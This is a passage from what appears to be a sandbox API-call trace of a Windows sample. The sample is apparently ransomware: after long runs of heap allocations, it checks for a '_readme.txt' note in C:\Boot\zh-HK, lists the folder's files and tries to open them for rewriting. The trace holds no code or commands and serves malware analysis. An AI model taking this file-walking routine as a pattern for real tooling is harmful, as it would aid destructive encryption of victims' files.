(HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.847] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.847] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.848] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.848] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.849] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.849] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.850] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.850] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.851] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.851] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.851] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.851] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.851] PathFindFileNameW (pszPath="") returned="" [0146.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.851] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.852] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.852] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.852] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.852] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.852] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.852] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.852] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.852] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.852] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.852] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.852] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.852] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.852] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.852] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x81c) returned 0x328f498 [0146.852] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0146.852] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.852] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.852] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0146.852] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.852] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.852] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.853] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.853] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.853] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.853] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.853] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.853] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.853] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0146.853] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.853] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.853] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.853] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.853] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.853] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.853] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned=".txt" [0146.853] HeapFree (in: 